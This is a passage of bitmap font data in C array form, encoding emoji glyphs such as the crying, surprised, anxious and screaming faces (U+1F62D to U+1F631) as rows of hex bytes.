0xff, 0xff, 0xf8, 0x0, 0x7e, 0x0, 0x1f, 0xff,
0xff, 0xff, 0xfe, 0x0, 0x3f, 0x0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0x80, 0x3d, 0xc0, 0x1e, 0xc1,
0x83, 0x6, 0xd, 0xe0, 0x1c, 0xe0, 0x1c, 0x60,
0xc1, 0x83, 0x6, 0x30, 0xe, 0x70, 0xe, 0x30,
0x60, 0xc1, 0x83, 0x1c, 0x7, 0x38, 0x6, 0x18,
0x30, 0x60, 0xc1, 0x86, 0x7, 0x8e, 0x3, 0xff,
0xff, 0xff, 0xff, 0xff, 0x3, 0x87, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0x81, 0xc1, 0xc0, 0xc3,
0x6, 0xc, 0x18, 0x30, 0xc1, 0xc0, 0xe0, 0x71,
0x83, 0x6, 0xc, 0x18, 0xc0, 0xe0, 0x78, 0x18,
0xc1, 0x83, 0x6, 0xc, 0x60, 0xe0, 0x1c, 0xf,
0x60, 0xc1, 0x83, 0x6, 0xe0, 0x70, 0x7, 0x3,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x70, 0x3, 0xc0,
0x7f, 0xff, 0xff, 0xff, 0xe0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F62D "😭" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x3, 0x0, 0x0, 0x0, 0x18,
0x7, 0x0, 0x1e, 0x7, 0x80, 0x0, 0x0, 0xf,
0x3, 0xc0, 0xe, 0xf, 0xc0, 0x0, 0x0, 0x7,
0xe0, 0xe0, 0xe, 0xf, 0x0, 0x0, 0x0, 0x0,
0x7c, 0x38, 0x7, 0xf, 0x0, 0x0, 0x0, 0x0,
0xf, 0x1c, 0x7, 0xe, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc7, 0x3, 0x8e, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf3, 0x83, 0x86, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xe1, 0xc1, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xe0, 0x7, 0xf0, 0x0, 0x0,
0x7f, 0x80, 0x38, 0xe0, 0xf, 0xfe, 0x0, 0x0,
0xff, 0xe0, 0xe, 0x70, 0xf, 0xf, 0x80, 0x0,
0xf8, 0x78, 0x7, 0x38, 0xf, 0x87, 0xe0, 0x0,
0xfc, 0x3e, 0x3, 0xb8, 0x2, 0xc3, 0xa0, 0x0,
0x2e, 0x1b, 0x1, 0xdc, 0x0, 0x61, 0xc0, 0x0,
0x7, 0xc, 0x0, 0x7e, 0x0, 0x30, 0xe0, 0x0,
0x3, 0x86, 0x0, 0x3f, 0x0, 0x18, 0x70, 0x0,
0x1, 0xc3, 0x0, 0x1f, 0x80, 0xc, 0x38, 0x0,
0x0, 0xe1, 0x80, 0xf, 0xc0, 0x6, 0x1c, 0x0,
0x0, 0x70, 0xc0, 0x7, 0xe0, 0x3, 0xe, 0x0,
0x0, 0x38, 0x60, 0x3, 0xf0, 0x1, 0x87, 0x0,
0x0, 0x1c, 0x30, 0x1, 0xf8, 0x0, 0xc3, 0x80,
0x0, 0xe, 0x18, 0x0, 0xfc, 0x0, 0x61, 0xc7,
0xff, 0x87, 0xc, 0x0, 0x7e, 0x0, 0x30, 0xef,
0xff, 0xfb, 0x86, 0x0, 0x3f, 0x0, 0x18, 0x7f,
0xc0, 0x7f, 0xc3, 0x0, 0x1d, 0xc0, 0xc, 0x3f,
0x0, 0x7, 0xe1, 0x80, 0x1c, 0xe0, 0x6, 0x1e,
0x0, 0x0, 0xf0, 0xc0, 0xe, 0x70, 0x3, 0xe,
0x0, 0x0, 0x38, 0x60, 0x7, 0x38, 0x1, 0x87,
0x0, 0x0, 0x1c, 0x30, 0x3, 0x8e, 0x0, 0xc3,
0x80, 0x0, 0xe, 0x18, 0x3, 0x87, 0x0, 0x61,
0xc0, 0x0, 0x7, 0xc, 0x1, 0xc3, 0xc0, 0x30,
0xff, 0xff, 0xff, 0x86, 0x1, 0xe0, 0xe0, 0x18,
0x7f, 0xff, 0xff, 0xc3, 0x0, 0xe0, 0x78, 0xc,
0x3f, 0xff, 0xff, 0xe1, 0x80, 0xf0, 0x1c, 0x6,
0x1f, 0xff, 0xff, 0xf0, 0xc0, 0x70, 0xf, 0x3,
0xf, 0xff, 0xff, 0xf8, 0x60, 0x78, 0x3, 0x81,
0x87, 0xff, 0xff, 0xfc, 0x30, 0x38, 0x0, 0xe0,
0xc3, 0xfe, 0x3, 0xfe, 0x18, 0x38, 0x0, 0x78,
0x61, 0xf0, 0x0, 0x1f, 0xc, 0x3c, 0x0, 0x1e,
0x30, 0xe0, 0x0, 0x3, 0x86, 0x3c, 0x0, 0x7,
0x98, 0x70, 0x0, 0x1, 0xc3, 0x3c, 0x0, 0x1,
0xec, 0x38, 0x0, 0x0, 0xe1, 0xbc, 0x0, 0x0,
0x7e, 0x1c, 0x0, 0x0, 0x70, 0xfc, 0x0, 0x0,
0xff, 0xe, 0x0, 0x0, 0x38, 0x7f, 0xc0, 0x1,
0xf0, 0x7, 0x80, 0x0, 0x3c, 0x1, 0xf0, 0x0,
0xe0, 0x1, 0xf0, 0x0, 0x7c, 0x0, 0x18, 0x0,
0x78, 0x0, 0xfc, 0x0, 0x7e, 0x0, 0x3c, 0x0,
0x1e, 0x0, 0x1f, 0x0, 0x7c, 0x0, 0x3c, 0x0,
0x3, 0x0, 0x3, 0x80, 0x38, 0x0, 0x1c, 0x0,
0x1, 0xc0, 0x1, 0xff, 0xfc, 0x0, 0x1e, 0x0,
0x0, 0x78, 0x3, 0xff, 0xff, 0x80, 0x3e, 0x0,
0x0, 0x1f, 0xff, 0xcf, 0xf9, 0xff, 0xfe, 0x0,
0x0, 0x1, 0xff, 0x0, 0x0, 0x1f, 0xf8, 0x0,
0x0,
/* U+1F62E "😮" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0xf0, 0x0, 0x3,
0xc0, 0x0, 0xe1, 0xc0, 0x0, 0xfc, 0x0, 0x3,
0xf0, 0x0, 0x71, 0xc0, 0x0, 0xff, 0x0, 0x3,
0xfc, 0x0, 0x3c, 0xe0, 0x0, 0x7f, 0x80, 0x1,
0xfe, 0x0, 0xe, 0x70, 0x0, 0x3f, 0xc0, 0x0,
0xff, 0x0, 0x7, 0x38, 0x0, 0x1f, 0xe0, 0x0,
0x7f, 0x80, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0x3f, 0xc0, 0x0, 0xfc, 0x0, 0x3, 0xf0, 0x0,
0xf, 0xc0, 0x0, 0x7e, 0x0, 0x0, 0xf0, 0x0,
0x3, 0xc0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0xf, 0xc0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x3f, 0xfc, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x3f, 0xff, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x3f, 0xff, 0xc0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x3f, 0xff, 0xf0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x1f, 0xff, 0xf8, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x1f, 0xff, 0xfe, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0xf, 0xff, 0xff, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x7, 0xff, 0xff, 0x80, 0x0, 0xe0, 0x1c, 0x0,
0x3, 0xff, 0xff, 0xc0, 0x0, 0x70, 0x7, 0x0,
0x1, 0xff, 0xff, 0xe0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0xff, 0xff, 0xf0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x3f, 0xff, 0xf0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x7, 0xff, 0xe0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x7f, 0x80, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F62F "😯" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x3, 0xe0, 0x0, 0x3, 0xe0,
0x1c, 0x0, 0x1c, 0xf, 0xf0, 0x0, 0x1, 0xfe,
0x7, 0x0, 0x1e, 0x1f, 0x0, 0x0, 0x0, 0x7,
0xc3, 0xc0, 0xe, 0x1e, 0x0, 0x0, 0x0, 0x0,
0xf0, 0xe0, 0xe, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x38, 0xf, 0x4, 0x0, 0x0, 0x0, 0x0,
0x4, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x7, 0x38, 0x0, 0x3f, 0x0, 0x0,
0x1f, 0x80, 0x3, 0xb8, 0x0, 0x3f, 0xc0, 0x0,
0x1f, 0xe0, 0x0, 0xfc, 0x0, 0x1f, 0xe0, 0x0,
0xf, 0xf0, 0x0, 0x7e, 0x0, 0xf, 0xf0, 0x0,
0x7, 0xf8, 0x0, 0x3f, 0x0, 0x7, 0xf8, 0x0,
0x3, 0xfc, 0x0, 0x1f, 0x80, 0x3, 0xfc, 0x0,
0x1, 0xfe, 0x0, 0xf, 0xc0, 0x0, 0xfc, 0x0,
0x0, 0x7e, 0x0, 0x7, 0xe0, 0x0, 0x3c, 0x0,
0x0, 0x1e, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x1, 0xff, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x1, 0xff, 0xc0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0xff, 0xe0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0xff, 0xf8, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x7f, 0xfc, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x3f, 0xfe, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x1f, 0xff, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0xf, 0xff, 0x80, 0x0, 0x38, 0x0, 0x38,
0x0, 0x3, 0xff, 0x80, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x1, 0xff, 0xc0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x7f, 0xc0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0xf, 0x80, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F630 "😰" */
0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0x19, 0xff, 0x80,
0x0, 0x0, 0x0, 0x1, 0xfe, 0x63, 0x31, 0xfc,
0x0, 0x0, 0x0, 0x0, 0xf8, 0xcc, 0x66, 0x37,
0xe0, 0x0, 0x0, 0x0, 0x3d, 0x19, 0x8c, 0xc6,
0x3f, 0x0, 0x0, 0x0, 0xf, 0x23, 0x31, 0x98,
0xc5, 0xf0, 0x0, 0x0, 0x7, 0x84, 0x66, 0x33,
0x18, 0x9f, 0x0, 0x0, 0x1, 0xf0, 0x8c, 0xc6,
0x63, 0x11, 0xf0, 0x0, 0x0, 0x7e, 0x11, 0x98,
0xcc, 0x62, 0x3f, 0x0, 0x0, 0x1e, 0xc2, 0x33,
0x19, 0x8c, 0x46, 0xf0, 0x0, 0x3, 0x98, 0x46,
0x63, 0x31, 0x88, 0xcf, 0x0, 0x0, 0xf3, 0x8,
0xcc, 0x66, 0x31, 0x19, 0xf0, 0x0, 0x3e, 0x61,
0x19, 0x8c, 0xc6, 0x23, 0x3e, 0x0, 0xe, 0xcc,
0x3f, 0x31, 0x98, 0xfc, 0x67, 0xe0, 0x1, 0x99,
0x87, 0x66, 0x33, 0x1f, 0x8c, 0xde, 0x0, 0x73,
0x33, 0xcc, 0xc6, 0x63, 0x7d, 0x99, 0xc0, 0xc,
0x67, 0xf1, 0x98, 0xcc, 0x63, 0xf3, 0x3c, 0x3,
0x8f, 0xfa, 0x33, 0x19, 0x8c, 0x7f, 0xe3, 0x80,
0x71, 0xfc, 0x46, 0x63, 0x31, 0x88, 0xfc, 0x78,
0x1e, 0x33, 0x8, 0xcc, 0x66, 0x31, 0x19, 0x8f,
0x3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1e, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0x60, 0x0, 0xf, 0x0, 0x0, 0x3c,
0x0, 0x7, 0xc, 0x0, 0x3, 0xf0, 0x0, 0xf,
0xc0, 0x0, 0x71, 0x84, 0x0, 0xff, 0x0, 0x3,
0xfc, 0x0, 0xe, 0x70, 0xc0, 0x1f, 0xe0, 0x0,
0x7f, 0x80, 0x1, 0xce, 0x3c, 0x3, 0xfc, 0x0,
0xf, 0xf0, 0x0, 0x39, 0x8f, 0x80, 0x7f, 0x80,
0x1, 0xfe, 0x0, 0x7, 0x31, 0xf8, 0xf, 0xf0,
0x0, 0x3f, 0xc0, 0x0, 0xe6, 0x73, 0x80, 0xfc,
0x0, 0x3, 0xf0, 0x0, 0x1c, 0xdc, 0x70, 0xf,
0x0, 0x0, 0x3c, 0x0, 0x3, 0x9f, 0x87, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x73, 0xe0, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x3c, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc7, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x71, 0xc0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x38,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xce,
0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x39,
0xc0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0xf,
0x38, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x1,
0xce, 0x0, 0xf, 0x0, 0x3f, 0xf0, 0x0, 0x0,
0x39, 0xc0, 0x0, 0xe0, 0x3f, 0xff, 0xc0, 0x0,
0xe, 0x38, 0x0, 0x1c, 0x1f, 0xff, 0xfe, 0x0,
0x1, 0xc7, 0x0, 0x3, 0x87, 0xff, 0xff, 0xe0,
0x0, 0x70, 0xe0, 0x0, 0x70, 0xff, 0xff, 0xfc,
0x0, 0xe, 0x1c, 0x0, 0xe, 0x3f, 0xff, 0xff,
0xc0, 0x3, 0x83, 0x80, 0x3, 0xc7, 0xff, 0xff,
0xf8, 0x0, 0xf0, 0x38, 0x0, 0x70, 0x7f, 0xff,
0xfe, 0x0, 0x1c, 0x7, 0x0, 0x1e, 0xf, 0xff,
0xff, 0xc0, 0x7, 0x0, 0x70, 0x7, 0x80, 0xff,
0xff, 0xf0, 0x1, 0xc0, 0x7, 0x81, 0xe0, 0x7,
0x80, 0x78, 0x0, 0x70, 0x0, 0x7f, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x1e, 0x0, 0x3, 0xff, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x7c, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x0,
0x3, 0xe0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1f, 0x0, 0x0, 0x0,
0x0, 0x0, 0xfe, 0x0, 0x3f, 0x80, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xff, 0x0, 0x0, 0x0,
0x0,
/* U+1F631 "😱" */
0x0, 0x0, 0x0, 0x0, 0xc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xfe,
0x23, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x7,
0xf9, 0x88, 0xc7, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe6, 0x62, 0x31, 0x9f, 0x80, 0x0, 0x0,
0x0, 0x3, 0xf1, 0x98, 0x8c, 0x63, 0xf0, 0x0,
0x0, 0x0, 0x3, 0xec, 0x66, 0x23, 0x18, 0xdf,
0x0, 0x0, 0x0, 0x1, 0xf3, 0x19, 0x88, 0xc6,
0x33, 0xe0, 0x0, 0x0, 0x0, 0xfc, 0xc6, 0x62,
0x31, 0x8c, 0xfc, 0x0, 0x0, 0x0, 0x7b, 0x31,
0x98, 0x8c, 0x63, 0x37, 0x80, 0x0, 0x0, 0x3c,
0xcc, 0x66, 0x23, 0x18, 0xcc, 0xf0, 0x0, 0x0,
0x1e, 0x33, 0x19, 0x88, 0xc6, 0x33, 0x1e, 0x0,
0x0, 0x7, 0x8c, 0xc6, 0x62, 0x31, 0x8c, 0xc7,
0x80, 0x0, 0x3, 0xe3, 0x31, 0x98, 0x8c, 0x63,
0x31, 0xf0, 0x0, 0x1, 0xf8, 0xcc, 0x66, 0x23,
0x18, 0xcc, 0x7e, 0x0, 0x0, 0x76, 0x33, 0x19,
0x88, 0xc6, 0x33, 0x1b, 0x80, 0x0, 0x39, 0x8c,
0xc6, 0x62, 0x31, 0x8c, 0xc6, 0x70, 0x0, 0x1e,
0x63, 0x31, 0x98, 0x8c, 0x63, 0x31, 0x9e, 0x0,
0x7, 0x18, 0xcc, 0x66, 0x23, 0x18, 0xcc, 0x63,
0x80, 0x1, 0xc6, 0x3f, 0xf9, 0x88, 0xc7, 0xff,
0x18, 0xe0, 0x0, 0xf1, 0x8f, 0xfe, 0x62, 0x31,
0xff, 0xc6, 0x3c, 0x0, 0x38, 0x7, 0x83, 0x80,
0x0, 0xf0, 0x78, 0x7, 0x0, 0x1e, 0x3, 0xc0,
0x70, 0x0, 0x78, 0xf, 0x1, 0xe0, 0x7, 0x0,
0xe0, 0xe, 0x0, 0x1c, 0x1, 0xc0, 0x38, 0x1,
0xc0, 0x70, 0x1, 0x80, 0xe, 0x0, 0x38, 0xe,
0x0, 0x70, 0x1c, 0x0, 0x60, 0x3, 0x80, 0xe,
0x3, 0x80, 0x3c, 0xe, 0x0, 0x18, 0x0, 0xe0,
0x1, 0xc0, 0xf0, 0xe, 0x3, 0x80, 0x3, 0x0,
0x70, 0x0, 0x70, 0x1c, 0x3, 0x80, 0xe0, 0x0,
0xc0, 0x1c, 0x0, 0x1c, 0x7, 0x0, 0xe0, 0x38,
0x0, 0x60, 0x3, 0x0, 0x7, 0x1, 0xc0, 0x38,
0xe, 0x0, 0x18, 0x0, 0xe0, 0x1, 0xc0, 0x70,
0xe, 0x3, 0x80, 0x6, 0x0, 0x38, 0x0, 0x70,
0x1c, 0x3, 0x80, 0x70, 0x3, 0x80, 0xf, 0x0,
0x38, 0x7, 0x0, 0xe0, 0x1c, 0x0, 0xc0, 0x1,
0xc0, 0xe, 0x1, 0xc0, 0x38, 0x3, 0x80, 0x70,
0x0, 0x38, 0x7, 0x0, 0x70, 0xf, 0x80, 0xf0,
0x38, 0x0, 0xf, 0x3, 0x80, 0x7c, 0x3, 0xf4,
0x1f, 0xfc, 0x0, 0x0, 0xff, 0xc0, 0x3f, 0x3,
0xcf, 0xc1, 0xfc, 0x0, 0x0, 0x1f, 0xe0, 0xfc,
0xf1, 0xf1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7e, 0x3e, 0xfc, 0x67, 0x0, 0x0, 0x1c, 0x0,
0x0, 0x39, 0x8f, 0xfb, 0x19, 0xc0, 0x0, 0xf,
0x80, 0x0, 0xe, 0x63, 0xbe, 0xc6, 0x38, 0x0,
0x7, 0xf0, 0x0, 0x7, 0x18, 0xef, 0xb1, 0x87,
0x0, 0x1, 0xfc, 0x0, 0x3, 0x8e, 0x3b, 0xec,
0x31, 0xe0, 0x0, 0xff, 0x80, 0x0, 0xe3, 0xc,
0xfb, 0x8c, 0x38, 0x0, 0x3f, 0xe0, 0x0, 0x70,
0xc7, 0x3e, 0x63, 0x87, 0x80, 0xf, 0xf8, 0x0,
0x78, 0x71, 0xdf, 0x9c, 0x60, 0xf0, 0x7, 0xff,
0x0, 0x3c, 0x18, 0xe7, 0x73, 0x1c, 0x1e, 0x1,
0xff, 0xc0, 0x1e, 0xe, 0x39, 0xdc, 0xe3, 0x83,
0xc0, 0x7f, 0xf0, 0xf, 0x7, 0x1c, 0x67, 0x18,
0xe0, 0x78, 0x1f, 0xfc, 0x7, 0x81, 0xc6, 0x38,
0xe7, 0x10, 0xf, 0x7, 0xff, 0x3, 0xc0, 0x23,
